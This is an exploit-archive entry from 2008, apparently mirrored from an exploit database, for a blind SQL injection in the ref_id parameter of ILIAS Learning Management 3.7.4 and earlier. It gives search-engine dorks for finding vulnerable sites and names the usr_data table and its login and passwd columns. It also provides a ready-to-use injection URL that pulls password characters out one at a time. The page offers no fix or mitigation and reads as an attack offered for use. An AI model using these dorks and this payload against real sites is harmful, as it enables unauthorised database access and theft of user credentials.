[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability
# Published : 2008-12-24
# Author : Lidloses_Auge
# Previous Title : doop CMS <= 1.4.0b (CSRF/Upload Shell) Multiple Remote Vulnerabilities
# Next Title : Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
###############################################################
#
# ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability
#
# Vulnerability discovered by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# Palme, GPM, karamble, Free-Hack
# Date: 24.12.2008
#
###############################################################
#
# Developer: http://www.ilias.de
# Dork 1: "powered by ILIAS"
# Dork 2: inurl:repository.php ilias
# Description: The GET Parameter "ref_id" in "repository.php"
# contains a Blind SQL Injection Vulnerability
#
# Usertable: usr_data
# Important columns: usr_id, login, passwd
#
# Example:
# http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
#
###############################################################
# www.Syue.com [2008-12-24]